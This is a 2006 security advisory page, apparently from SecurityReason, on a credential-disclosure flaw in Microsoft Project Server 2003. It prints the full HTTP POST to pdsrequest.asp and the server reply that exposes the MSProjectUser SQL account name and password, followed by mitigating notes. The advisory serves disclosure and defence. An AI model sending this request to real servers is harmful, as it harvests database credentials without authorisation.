|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2047 CVE : CVE-2006-6617 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Brett Moore (brett moore security-assessment com) Published : 19.12.2006
Advisory Text : ============================================================== % Project Server 2003 - Credential Disclosure % brett.moore (at) security-assessment (dot) com [email concealed] ============================================================== Microsoft Project server 2003 implements a thick client for some of the functionality. The thick client uses XML requests to talk to the server of HTTP(S). One of these requests returns the username and password of the MSProjectUser account used to access the SQL database as well as other system information. -------------------------------------------------------------- POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0 Accept: */* Accept-Language: en-nz Pragma: no-cache Host: SERVER Content-length: 87 Proxy-Connection: Keep-Alive Cookie: PjSessionID=<valid cookie> <Request> <GetInitializationData> <Release>1</Release> </GetInitializationData> </Request> <Reply> <HRESULT>0</HRESULT> <STATUS>0</STATUS> <UserName>theuser</UserName> <GetInitializationData> <GetLoginInformation> <DBType>0</DBType> <DVR>{SQLServer}</DVR> <DB>ProjectServer</DB> <SVR>SERVER</SVR> <ResGlobalID>1</ResGlobalID> <ResGlobalName>resglobal</ResGlobalName> <UserName>MSProjectUser</UserName> <---- <Password>sekretpass</Password> <---- <UserNTAccount>SERVERUSER</UserNTAccount> </GetLoginInformation> </Reply> -------------------------------------------------------------- Some quick notes that mitigate this attack; * The cookie must be a valid cookie, which is obtained via a login with a valid username and password. * Since the thick client is 'client side' any sql can be manipulated anyway. * The MSProjectUser should be a low level account anyway * Other 'undocumented' or 'unauthorised' requests 'may' also be able to be made through this method. ============================================================== % ==============================================================  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |